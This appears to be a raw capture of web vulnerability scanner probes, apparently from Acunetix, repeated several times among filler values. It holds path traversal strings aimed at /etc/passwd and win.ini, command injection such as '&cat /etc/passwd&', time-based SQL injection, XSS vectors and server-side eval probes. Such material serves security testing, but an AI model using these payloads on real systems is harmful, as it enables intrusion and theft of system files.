../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934242)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9269910*9758201)+'

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(961339))>

1

"+response.write(9269910*9758201)+"

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(964701)>

1

WEB-INF\web.xml

1

1

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926881)>

`cat /etc/passwd`

${100348+99178}

1

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(952609)>

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n953193=v970080

)

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(910952)>

-1))

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1<ScRiPt%20>prompt(939011)</sCripT>

iwoevliL'

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

YQo2FAc1')

1&lt

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

4aC0T3pr'))

1

1

1

/etc/passwd

<img acu onmouseover=prompt(977153) //>

1

"

1

1

1

'

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitHDlfEKvyhe.bxss.me/

1

1<input autofocus onfocus=prompt(935155)>

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

"

-1)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

1

1

||cat /etc/passwd

1

comments

mRZkrrAB'

1

................etc/passwd

1_pGpOV <ScRiPt >prompt(948203)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

npQ90Lqu')

&dir

http://www.acunetix.tst

'"

1

1

1

1

C4BrJCuu'))

1

'&dir&'

<!--

1

1

1'"()&%<ScRiPt >prompt(989061)</ScRiPt>

1

file:///etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(913573)</ScRiPt>

"&dir&"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_971255

1

|dir

1

1

WEB-INF/web.xml

1

'|dir

WEB-INF\web.xml

../../../../../../../../../../windows/win.ini

"|dir

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu2860<s1﹥s2ʺs3ʹuca2860

windowswin.ini

1

1

1

acux6450z1z2abcxuca6450

................windowswin.ini

1

1

1<ScRiPt >prompt(996258)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(996918)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(987419)</ScRiPt>

1

1

response.write(9990914*9714155)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910592></ScRiPt>

1

1

'+response.write(9990914*9714155)+'

1<ScRiPt >prompt(911651)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(964844)">

"+response.write(9990914*9714155)+"

../../../../../../../../../../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902136)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1<div style=width:expression(prompt(963463))>

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

1

1<body onload=prompt(966959)>

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99675+99581}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998041)>

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n922994=v974243

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1<img src=xyz OnErRor=prompt(985454)>

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1)

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(915587)>

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

!(()&&!|*|*|

-1))

'"()

1

testasp.vulnweb.com

1<ScRiPt%20>prompt(930942)</sCripT>

1

^(#$!@#$)(()))******

/etc/passwd

1

x4nWTP2e'

1

1

1

1&lt

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

Rc1h3iFw')

1

1

1

"

<img acu onmouseover=prompt(941160) //>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

5N1dKTwJ'))

"

1

1

1<input autofocus onfocus=prompt(927680)>

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

-1

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

http://hitNrfjhxKwAV.bxss.me/

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

&dir

-1)

1

acunetix_wvs_invalid_filename

1_7ciXa <ScRiPt >prompt(955418)</ScRiPt>

1

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

'&dir&'

1

1

file:///etc/passwd

1

nXtpGFnH'

/\../\../\../\../\../\../\../etc/passwd

1

comments

1

1

"&dir&"

http://www.acunetix.tst

1

E72HwRN6')

'"

1

1'"()&%<ScRiPt >prompt(990040)</ScRiPt>

comments/.

WEB-INF/web.xml

1

|dir

1

1

lZvNQQaA'))

<!--

'"()&%<ScRiPt >prompt(919931)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1_923795

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

windowswin.ini

1

1

................windowswin.ini

1

1

acu3749<s1﹥s2ʺs3ʹuca3749

..\..\..\..\..\..\..\..\windows\win.ini

acux2556z1z2abcxuca2556

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(990585)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(920137)</script>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(977328)</ScRiPt>

1

response.write(9927716*9024735)

1

1

1

'+response.write(9927716*9024735)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995864></ScRiPt>

1

&cat /etc/passwd&

1

1

"+response.write(9927716*9024735)+"

1

WEB-INF/web.xml

1<ScRiPt >prompt(973465)</ScRiPt>

'&cat /etc/passwd&'

1

1

1

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<video><source onerror="javascript:prompt(930695)">

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981559)"></g></svg>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(912355))>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

${99432+99688}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<iframe src='data:text/html

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

1

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(908110)>

1&n988746=v902667

1

-1)

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934653)>

)

testasp.vulnweb.com

-1))

1

1

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1<img src=xyz OnErRor=prompt(914860)>

'"()

!(()&&!|*|*|

US30g01o'

1

1

1

^(#$!@#$)(()))******

1<img/src=">" onerror=alert(963889)>

'

/etc/passwd

1

AUCnL5hG')

1

1<ScRiPt%20>prompt(902915)</sCripT>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

lw9blOrt'))

1&lt

1

1

1

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1

<img acu onmouseover=prompt(987072) //>

1

http://hitzeaGjcfYNn.bxss.me/

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

................etc/passwd

1<input autofocus onfocus=prompt(910002)>

-1)

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1))

1

1

1

http://www.acunetix.tst

comments

1

&dir

[url=http://www.acunetix.com]website security[/url]

obzwR4WM'

file:///etc/passwd

1

'"

comments/.

1'"()&%<ScRiPt >prompt(971061)</ScRiPt>

0SHTbcmO')

'&dir&'

1_bGvs5 <ScRiPt >prompt(934833)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

nthzqVy7'))

'"()&%<ScRiPt >prompt(943618)</ScRiPt>

1

"&dir&"

1

1

1

WEB-INF/web.xml

1

1

1_943697

1

1

|dir

1

1

1

1

WEB-INF\web.xml

1

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

acu1660<s1﹥s2ʺs3ʹuca1660

1

1

................windowswin.ini

1

acux5889z1z2abcxuca5889

1

1

1<ScRiPt >prompt(985774)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(938533)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

response.write(9859998*9982560)

1<ScRiPt >prompt(923226)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996649></ScRiPt>

'+response.write(9859998*9982560)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(936939)</ScRiPt>

&cat /etc/passwd&

"+response.write(9859998*9982560)+"

1

1

1

1<video><source onerror="javascript:prompt(990773)">

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989115)"></g></svg>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

WEB-INF\web.xml

1

1<div style=width:expression(prompt(930151))>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

${99600+99181}

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n958674=v914658

1

`cat /etc/passwd`

1<body onload=prompt(929768)>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984347)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(997091)>

'|'ld

'"()

testasp.vulnweb.com

1

1

1<img/src=">" onerror=alert(966676)>

XG4sgrkP'

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

"|"ld

1

1<ScRiPt%20>prompt(996258)</sCripT>

AAJGiHL7')

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

1

1

1

RRUJHs0P'))

1

1&lt

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<img acu onmouseover=prompt(957101) //>

'

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitKdk9mO1Y5I.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(977166)>

1

acunetix_wvs_invalid_filename

1

1

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

1'"()&%<ScRiPt >prompt(903742)</ScRiPt>

1

................etc/passwd

http://www.acunetix.tst

'"

comments

CPeYZAdD'

1

1_hqcVR <ScRiPt >prompt(999025)</ScRiPt>

'"()&%<ScRiPt >prompt(968351)</ScRiPt>

1

CYQDRXtP')

||cat /etc/passwd

comments/.

<!--

1

1

1_993086

1

1

file:///etc/passwd

1

NzAAyRSZ'))

1

1

&dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'&dir&'

1

WEB-INF/web.xml

1

"&dir&"

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

|dir

acu5896<s1﹥s2ʺs3ʹuca5896

'|dir

1

../../../../../../../../../../boot.ini

acux2685z1z2abcxuca2685

1

1

1<ScRiPt >prompt(996916)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1<script>prompt(943266)</script>

1

1

windowswin.ini

1<ScRiPt >prompt(934055)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941937></ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(927769)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9996670*9623594)

1

1

1<video><source onerror="javascript:prompt(980946)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

'+response.write(9996670*9623594)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964738)"></g></svg>

1

"+response.write(9996670*9623594)+"

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(928404))>

1

'&cat /etc/passwd&'

1

1

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1<body onload=prompt(994344)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

${99927+99099}

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909956)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1

1

-1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(976511)>

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1&n993778=v941614

)

|cat /etc/passwd#

-1)

1

1<img/src=">" onerror=alert(989496)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

-1))

1

1

'|'ld

1<ScRiPt%20>prompt(974714)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

bsjQhIC8'

1

kGaaQzjc')

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

testasp.vulnweb.com

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

<img acu onmouseover=prompt(938877) //>

1

v27ur9u4'))

'

'"()

1

1

1

1

/etc/passwd

1<input autofocus onfocus=prompt(922773)>

-1

"

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

'

-1)

1

[url=http://www.acunetix.com]website security[/url]

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1_XzM83 <ScRiPt >prompt(988309)</ScRiPt>

1

1

1

1

1

g35Wgxbb'

1

acunetix_wvs_invalid_filename

http://hitMyonrhG7FK.bxss.me/

||cat /etc/passwd

1

6qCIYUaU')

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................etc/passwd

comments

1

1

&dir

1

gv8vjxf9'))

1

1

1

comments

1

http://www.acunetix.tst

'&dir&'

'"

1

1'"()&%<ScRiPt >prompt(907544)</ScRiPt>

1

comments/.

<!--

1

"&dir&"

1

'"()&%<ScRiPt >prompt(928319)</ScRiPt>

1

1

|dir

1

1_963987

1

1

file:///etc/passwd

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu9626<s1﹥s2ʺs3ʹuca9626

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux9213z1z2abcxuca9213

1

windowswin.ini

1<ScRiPt >prompt(942715)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(906699)</script>

1

response.write(9529482*9496077)

1

1

1

'+response.write(9529482*9496077)+'

1<ScRiPt >prompt(936477)</ScRiPt>

&cat /etc/passwd&

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9529482*9496077)+"

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932264></ScRiPt>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(905562)</ScRiPt>

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988521)">

1

if(now()=sysdate(),sleep(3.359),0)/*'XOR(if(now()=sysdate(),sleep(3.359),0))OR'"XOR(if(now()=sysdate(),sleep(3.359),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

${99470+99226}

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985461)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(3.359)))v)/*'+(select(0)from(select(sleep(3.359)))v)+'"+(select(0)from(select(sleep(3.359)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1&n973379=v985934

1<div style=width:expression(prompt(986843))>

1some_inexistent_file_with_long_name%00.jpg

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

WEB-INF/web.xml

'|'ld

1

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

WEB-INF\web.xml

testasp.vulnweb.com

^(#$!@#$)(()))******

1<body onload=prompt(971772)>

-1))

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947170)>

1

1

1

1

afAjJFcQ'

1<img src=xyz OnErRor=prompt(996355)>

1

1

1

/etc/passwd

'"()

hSq4X0uU')

1

'

1

1<img/src=">" onerror=alert(913445)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

EEVJA0vf'))

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<ScRiPt%20>prompt(909753)</sCripT>

1

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1&lt

-1)

1

1

acunetix_wvs_invalid_filename

http://hitJSsjtb1JBX.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<img acu onmouseover=prompt(975502) //>

-1))

1

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

UIjFap08'

1<input autofocus onfocus=prompt(936853)>

http://www.acunetix.tst

1

1

'"

comments

'&dir&'

1'"()&%<ScRiPt >prompt(948949)</ScRiPt>

GBowa3Q0')

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

'"()&%<ScRiPt >prompt(948397)</ScRiPt>

1

"&dir&"

comments/.

<!--

[url=http://www.acunetix.com]website security[/url]

eo8CXZVL'))

1

|dir

1

1_aE1jm <ScRiPt >prompt(917147)</ScRiPt>

1_968083

1

1

1

1

1

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

acu3445<s1﹥s2ʺs3ʹuca3445

1

../../../../../../../../../../windows/win.ini

1

1

1

acux1542z1z2abcxuca1542

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(904070)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(950262)</script>

windowswin.ini

1

1

1

1<ScRiPt >prompt(983826)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969091></ScRiPt>

1

1

1<ScRiPt >prompt(995665)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(958434)">

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946860)"></g></svg>

1

1

response.write(9551022*9328753)

1<div style=width:expression(prompt(951761))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9551022*9328753)+'

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

"+response.write(9551022*9328753)+"

1

1

1<body onload=prompt(918168)>

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952270)>

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(942094)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(936254)>

${100356+99540}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(919346)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1&lt

1&n987317=v903392

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

-1)

1

1

<img acu onmouseover=prompt(962003) //>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

testasp.vulnweb.com

1

1

1<input autofocus onfocus=prompt(912092)>

!(()&&!|*|*|

KKyobPzg'

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

<a href='http://www.acunetix.com'>website security</a>

1

nhscRs2m')

^(#$!@#$)(()))******

'"()

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

[url=http://www.acunetix.com]website security[/url]

1

1

0S28dxSc'))

1

1

/etc/passwd

'

"

1_u5XLE <ScRiPt >prompt(911137)</ScRiPt>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

${@print(md5(acunetix_wvs_security_test))}

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

||cat /etc/passwd

http://hiteFyyP3sNSA.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

-1))

1

1

1

1

&dir

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

cD6o9mhl'

1

'"

1'"()&%<ScRiPt >prompt(923217)</ScRiPt>

1

comments

'&dir&'

1OT28epS')

<!--

'"()&%<ScRiPt >prompt(934036)</ScRiPt>

1

comments/.

1

1

"&dir&"

1

4nhg10T6'))

1_967878

1

1

1

................etc/passwd

1

|dir

1

1

1

'|dir

1

